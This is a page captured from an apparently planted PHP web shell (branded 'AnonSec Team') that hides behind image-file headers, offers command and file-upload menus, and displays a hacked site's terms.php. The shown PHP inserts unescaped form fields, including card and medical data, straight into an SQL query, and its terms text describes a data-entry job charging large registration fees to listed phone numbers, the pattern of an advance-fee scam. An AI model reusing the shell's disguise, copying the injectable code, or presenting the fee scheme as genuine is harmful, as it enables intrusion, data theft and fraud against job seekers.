����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 3.145.155.149
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/.well-known/../../www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/.well-known/../../www/terms.php
<?php

include "db.php";
include "header.php";
include "sidebar.php";


$user_id=$_SESSION['id'];


   $a=0;
  $select = "SELECT * FROM `new_resume` WHERE `remark`= $a ORDER BY id DESC LIMIT 1";
   $result = $conn->query($select);
    while($row = $result->fetch_object())
         {
                             
             $pdf = $row->resume;
             $b = $row->id;

         }
              


if (isset($_POST['form']))
{

   $remark=1; 
   $query="UPDATE new_resume SET remark=? WHERE id=?";
   $stmt=$conn->prepare($query);
   $stmt->bind_param("ss",$remark,$b);
   $stmt->execute();
 

      $name = $_POST['name'];
      $country_1 = $_POST['country1'];
      $state2 = $_POST['state2'];
      $policy = $_POST['policy'];
      $medicine = $_POST['medicine'];
      $record =$_POST['record'];
      $sex1 = $_POST['sex1'];
      $zip2 = $_POST['zip2'];
      $assure = $_POST['assure'];
      $dosage =$_POST['dosage'];
      $customer =$_POST['customer'];
      $db = $_POST['db'];
      $country2 =$_POST['country2'];
      $p_inst = $_POST['p_inst'];
      $tablets = $_POST['tablets'];
      $email =$_POST['email'];
      $height= $_POST['height'];
      $phone2 =$_POST['phone2'];
      $holder = $_POST['holder'];
      $pill_rate = $_POST['pill_rate'];
      $res_address = $_POST['res_address'];
      $weight = $_POST['weight'];
      $alcoholic = $_POST['alcoholic'];
      $stm_name = $_POST['stm_name'];
      $cost =$_POST['cost'];
      $city1 = $_POST['city1'];
      $blood = $_POST['blood'];
      $smoker =$_POST['smoker'];
      $stm_code = $_POST['stm_code'];
      $shipping = $_POST['shipping'];
      $state1 =$_POST['state1'];
      $billing = $_POST['billing'];
      $past_surg =$_POST['past_surg'];
      $dob =$_POST['dob'];
      $total =$_POST['total'];
      $zip1 =$_POST['zip1'];
      $shiper = $_POST['shiper'];
      $diabletic =$_POST['diabletic'];
      $sex2 = $_POST['sex2'];
      $remark = $_POST['remark'];
      $phone = $_POST['phone1'];
      $city2 = $_POST['city2'];
      $allergiesd =$_POST['allergiesd'];
      $card = $_POST['card'];

   
      
      $query = "INSERT INTO forms(name,email,country_1,state1,policy_no,medicine,record_no,sex,zip,life_assure,dosage,customer,db,country_2,p_inst,tablets,height,phone2,name_p_holder,pill_rate,res_address,weight,alcoholic,stm_name,cost,city1,blood,smoker,stm_code,shipping_cost,state,billing_name,past_surg,dob,total_amount,zip1,shiper_name,diabetic,sex2,remark,phone1,city2,allergiest,card,pdf,user_id)
      VALUES ('".$name."', '".$email."', '".$country_1."', '".$state2."', '".$policy."', '".$medicine."', '".$record."', '".$sex1."', '".$zip2."', '".$assure."', '".$dosage."', '".$customer."', '".$db."', '".$country2."', '".$p_inst."', '".$tablets."', '".$height."', '".$phone2."', '".$holder."', '".$pill_rate."', '".$res_address."', '".$weight."', '".$alcoholic."', '".$stm_name."', '".$cost."', '".$city1."', '".$blood."', '".$smoker."', '".$stm_code."', '".$shipping."', '".$state1."', '".$billing."', '".$past_surg."', '".$dob."', '".$total."', '".$zip1."', '".$shiper."', '".$diabletic."', '".$sex2."', '".$remark."', '".$phone."', '".$city2."', '".$allergiesd."', '".$card."', '".$pdf."','".$user_id."')";
      mysqli_query($conn, $query);

        }
  

?>
<style>
  @media(max-width: 600px)
  {
    .hide{
      display: none;
    }
.hide1{
     display: show;
    }
  }
  @media(min-width: 601px)
  {
    .hide{
     display: show;
    }
     .hide1{
      display: none;
    }
  }

</style>
<style>
div.scrollmenu {
  background-color: white;
  overflow: auto;
  white-space: nowrap;
}

div.scrollmenu a {
  display: inline-block;
  color: white;
  text-align: center;
  padding: 14px;
  text-decoration: none;
}

div.scrollmenu a:hover {
  background-color: white;
}
.previous {
  background-color: #f1f1f1;
  color: black;
}

.next {
  background-color: #04AA6D;
  color: white;
}

.round {
  border-radius: 50%;
}
</style>
<style>
table {
  border-collapse: collapse;
  width: 80%;
}

th, td {
  text-align: left;
  padding: 8px;
}

tr:nth-child(even){background-color: #f2f2f2}

th {
  background-color: black;
  color: white;
}

</style>
  <main id="main" class="main">

    <div class="pagetitle">
      <h1>Terms & Condition</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="index.php">Home</a></li>
          <li class="breadcrumb-item active">Terms & Condition</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->

    



    <section class="section dashboard">
      <div class="row">

        <!-- Left side columns -->
        <div class="col-lg-12">
          <div class="row">

            <!-- Sales Card -->
            <div class="col-sm-12" >
              <div class="card info-card sales-card"  style="text-align:justify; padding:2%;">
                <div class="card-body">
                
 <h4 style="font-family: Times New Roman;font-size: 19px;"><b>CURRENTLY THIS CONTRACT WITNESSETH AS FOLLOW:</b></h4>
 <h4 style="font-family: Times New Roman;font-size: 19px;"><b>1. Scope of Work:</b></h4>
 <h4 style="font-family: Times New Roman;font-size: 19px;"><b>Accuracy level:</b></h4> One field missing in a row that means this row is mistake. Errors Considered as per
below mentioned. Spelling Mistakes / Symbol Missing / Text Missing/ Word Exchanged – One error QC
(Quality Check) will be done by end client QC department. So Report as well as payment will be sent
only after 7 days. Payment will be made either by cash cheque or Account transfer (NEFT) which ever
do you prefer.
Payment will not be made for those who did not achieve the accuracy level</p>

 <h4 style="font-family: Times New Roman;font-size: 19px;"><b>Eligibility</b></h4> 
 ✓ He / she should arrange the pc or laptop at their own cost.<br>
✓ He / she should have basic knowledge about the computer.</p>


<h4 style="font-family: Times New Roman;font-size: 19px;"><b>Reasons for job rejection </b></h4> 
1. File sent after the deadline date.<br>
2. If Text is not set to “TIMES NEW ROMAN” font.<br>
3. Font size other than mentioned size.<br>
4. Files are not completed.<br>
5. If the Header is not in Bold letters. (Name, Surname, Address etc.…..)<br>
6. File will be rejected if unwanted Shift enters, enters, paragraph spacing mismatch, different page
setup, double spaces unnecessary.<br>
7. Different name for Files or Folder.<br>
8. Copy Paste or Converted data not allow.<br>
9. If the Folder which contains the Excel file is not Zipped.<br>
10. Only Excel file is allowed. If any other file is found other than Excel file.<br>
11. Color text found in document. <br></p>

<h4 style="font-family: Times New Roman;font-size: 19px;"><b>Instructions for Typing.  </b></h4> 
1. All entries should be done according to serial wise given in Image file.<br>
2. Font size should be 12 and style should be Times New Roman.<br>
3. All entries should be in Single Excel Sheet.<br>
4. Font Size for - Headings / Title like Name, contact no , mail ID should be 14 Font size with bold.<br>
5. Excel file name should be as it is given.<br>
6. No copy paste.<br>
</p><br>

<h4 style="font-family: Times New Roman;font-size: 19px;"><b>2. Plans and Payments:
</b></h4> 
Payments depending upon Accuracy of Work. Accuracy will be calculated per row / entries. The
payment structure is mentioned below
</p>
<center><h4 style="font-family: Times New Roman;font-size: 19px;"><b>
Single user plan:-</center>
</b></h4> 
<center>
<table>
  <tr>
    <th>Registration Fee</th>
    <th>3540/- (including GST)</th>
    <th>5900/- (including GST)</th>
  </tr>
  <tr>
    <td>Work Records</td>
    <td>2500 Records</td>
    <td>3500 Records
</td>
  </tr>
  <tr>
    <td>Duration</td>
    <td>7 Days</td>
    <td>7 Days</td>
  </tr>
  <tr>
    <td>Mistakes Allow </td>
    <td>200</td>
    <td>200</td>
  </tr>
  <tr>
    <td>Total Pay</td>
    <td>17,700/- (including GST) </td>
    <td>28,320/- (including GST)</td>
</tr>
</table></center>

<br>
<center><h4 style="font-family: Times New Roman;font-size: 19px;"><b>
Double user plan:-</center>
</b></h4> 
<center>
<table>
  <tr>
    <th>Registration Fee</th>
    <th>11,800/- (including GST) </th>
    <th>17,700/-(including GST)</th>
  </tr>
  <tr>
    <td>Work Records</td>
    <td>5000 Records</td>
    <td>7000 Records
</td>
  </tr>
  <tr>
    <td>Duration</td>
    <td>10 Days</td>
    <td>10 Days</td>
  </tr>
  <tr>
    <td>Mistakes Allow </td>
    <td>250</td>
    <td>250</td>
  </tr>
  <tr>
    <td>Total Pay</td>
    <td>47,200/- (including GST) </td>
    <td>74,340/- (including GST)</td>
</tr>
</table></center>


<br>
<center><h4 style="font-family: Times New Roman;font-size: 19px;"><b>
Multiple user/Business plan:-</center>
</b></h4> 
<center>
<table>
  <tr>
    <th>Registration Fee</th>
    <th>23600/- (including GST)</th>
    <th>41300/- (including GST)</th>
  </tr>
  <tr>
    <td>Work Records</td>
    <td>15000 Records</td>
    <td>30000 Records
</td>
  </tr>
  <tr>
    <td>Duration</td>
    <td>20 Days</td>
    <td>20 Days</td>
  </tr>
  <tr>
    <td>Mistakes Allow </td>
    <td>700</td>
    <td>1000</td>
  </tr>
  <tr>
    <td>Total Pay</td>
    <td>1,41,600/- (including GST) </td>
    <td>3,54,000/- (including GST)
</td>
</tr>
</table></center>
<br>

<h4 style="font-family: Times New Roman;font-size: 19px;"><b> 3. Accuracy: 
</b></h4> 
● Client must provide or submit the data in the prescribed duration of as per plan working days
depending upon the Job work purchased. Both parties agree to assure highest quality of end
service.<br>
● Accuracy report and security clearance report as well as data will kept confidential by both the
parties. The report would be submitted for QC and after 7 days the result would be displayed. <br>
● Payment would not be made if the accuracy is not met as per plan. Contract will be terminated
without further notice or request would be entertained.<br>
● No partial submission or delay in submission and not maintaining the TAT will be entertained
and if it is found so then client has the right to terminate the contract then and there itself
without any further notice and no unwanted claims will be entertained.<br>
● In case of consistently good/quality performance, the Client may consider giving more work to
our Business Associate and may consider increasing the job work (data entries).

</p><br>

<h4 style="font-family: Times New Roman;font-size: 19px;"><b>4. Short supply of Data: 
</b></h4> 
▪ If the Client fails to provide the data in full or if there is short supply of Data below the accuracy
then the jobs of the client would be rejected, and no partial data submission will be
entertained.<br>
5. If the client wants to stop the process or cannot proceed any further with the process by his own
will then the charges paid by the client will be Non-refundable or Non-Adjustable.<br>
6. The Client will execute the data processing work provided by us through experienced persons in
such manner so as to carry out the work efficiently at accuracy.<br>
7. <b>On receipt of the job work the Client has to wait for 7 days for QC after 7 days the result would
be displayed with details of accuracy and errors.</b><br>
This agreement represents the Business Agreement and operational understandings between the
parties and shall remain in effect for a period of Six months from the date of execution hereof &
can be extended for the period as mutually agreed upon till Twenty-Fourth month. The Clients'
specifications in terms of quality and other parameters that shall be issued by the Client/their
principals from time to time and acknowledged by us shall be read with this agreement.
The business associate has done all the due diligence from their side and then signing up the
contract without any force.
</p>
<br>
<h4 style="font-family: Times New Roman;font-size: 19px;"><b>9. Variation:</b></h4> 
Except as otherwise expressly provided in this Agreement, this Agreement may not be changed
or modified in any way after it has been signed, except in writing signed by or on behalf of both of the
parties</p>
<br>
<h4 style="font-family: Times New Roman;font-size: 19px;"><b>10. Dispute Resolution & Jurisdiction:</b></h4>
● In the event of any dispute or difference arising between the parties hereto relating to or
arising out of this Agreement, including the implementation, execution, interpretation,
rectification, validity, enforceability, termination or rescission thereof, including the rights,
obligations or liabilities of the parties hereto, the same will be adjudicated and determined by
arbitration. For purpose of fair arbitration, The Indian Arbitration & Conciliation Act, 1996 or
any statutory amendment or re-enactment thereof in force in India, shall govern the reference.
The Business Associate hereby declares all queries and obligations in respect to the abovementioned project were duly verified by the Business.<br>
● Both the parties hereby agree neither to Circumvent or nor to disclose the identities,
Information as well as the essence of the project etc of each other’s/Principals, Clients etc to
any other Third party and neither of us will approach each other’s contracts as identified from
time to time.<br>
● If it is found that any information of the project or any data or any other official
documents being shared by the client to any third-party during contract than it will be
considered as breach of contract and the contract will be terminated without any further
notice and no unwanted claims will be entertained. Client hereby declares that they have
verified the process and do accept the terms and condition as per the agreement and has no
obligation related to the process.<br>
● After successful completion of your first project Clint will get the next five projects
from the company’s side without any registration charge.<br>
● This projects only consist of the registration charge, leaving this no any other charges
are included.<br>
● Registration amount should be paid on company account or in company phone pay or
G pay only(+919146902678, +918956375911). If you paid any other account so company is not
responsible for any fraud issues.<br> 
<br>

<center>
    <h4 style="font-family: Times New Roman;font-size: 19px;"><b>VFLYORIONS TECHNOLOGIES PVT LTD. don’t used to charge any other charges
rather than registration amount.
</b></h4>
</center>

                </div>

              </div>
            </div><!-- End Sales Card -->

            

      



  </main><!-- End #main -->

<script>
document.addEventListener('contextmenu', event=> event.preventDefault()); 
document.onkeydown = function(e) { 
if(event.keyCode == 123) { 
return false; 
} 
if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)){ 
return false; 
} 
if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)){ 
return false; 
}
if(e.ctrlKey && e.shiftKey && e.keyCode == 'C'.charCodeAt(0)){ 
return false; 
} 

if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)){ 
return false; 
} 
} 
</script>
  
<?php
include "footer.php";
  ?>

AnonSec - 2021